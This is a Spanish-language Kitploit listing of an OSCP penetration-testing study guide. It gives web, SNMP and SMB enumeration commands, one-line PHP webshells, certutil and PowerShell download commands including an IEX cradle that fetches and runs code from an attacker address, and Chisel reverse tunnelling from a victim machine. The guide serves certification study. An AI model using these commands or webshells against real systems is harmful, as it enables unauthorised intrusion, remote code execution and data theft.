Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
OSCP — OSCP Study Guide | Kitploit
Herramientas/GitHubGitHub/rootsecdev/oscp
ReconnaissanceExploitationWeb Application ExploitationPost-ExploitationWeb SecurityNetwork SecurityPenetration TestingLearning & EducationRed Teaming
GitHubrootsecdev/oscp

OSCP

OSCP Study Guide

425hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

OSCP

Guía de estudio OSCP

Tabla de contenido

Enumeración y reconocimiento

Enumeración web

Escaneo con Nikto:

root@kitploit:~
nikto -h http://10.10.10.1

Enumeración de directorios con diferentes herramientas:

DIRB

root@kitploit:~
dirb http://10.10.10.1

Gobuster

root@kitploit:~
gobuster dir -u http://10.129.155.74:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx

Pentesting de aplicaciones web

Payloads XSS: Hoja de referencia: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection

Pruebas básicas de formularios XSS con un listener de netcat o un servidor web de python

root@kitploit:~

Cross-site scripting para volcar cookies en base64. Asegúrate de codificar la URL en burp con ctrl + u

root@kitploit:~

Webshells

Referencia: https://sushant747.gitbooks.io/total-oscp-guide/content/webshell.html

Webshell PHP simple para ejecución de comandos

root@kitploit:~
<?php system($_REQUEST ['cmd']) ?>
root@kitploit:~
<?php system($_GET['cmd']); ?>

Pentesting SNMP

Puerto 161 UDP

root@kitploit:~
snmpwalk -c public -v2c 10.129.213.210
root@kitploit:~
snmp-check 10.129.213.210

Pentesting SMB

root@kitploit:~
crackmapexec smb 10.129.70.254 

Detectar recursos compartidos anónimos abiertos

root@kitploit:~
smbclient -L //10.129.70.254

Autenticación nula

root@kitploit:~
smbclient -N -L //10.129.70.254

Post-explotación

Descarga y transferencia de archivos

Certutil:

root@kitploit:~
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

PowerShell:

root@kitploit:~
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
root@kitploit:~
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.11.0.4/nc.exe')"

Reenvío de puertos y tunelización

Usando Chisel:

Ejemplo usando reenvío de puertos para que el puerto 910 esté disponible en la máquina Kali

root@kitploit:~
on victim machine setup port forwarding
chisel.exe client 10.10.16.10:5555 R:910:127.0.0.1:910
root@kitploit:~
On Kali attack box setup a reverse listner for port forward with chisel
./chisel server --port 5555 --reverse
Descargar herramienta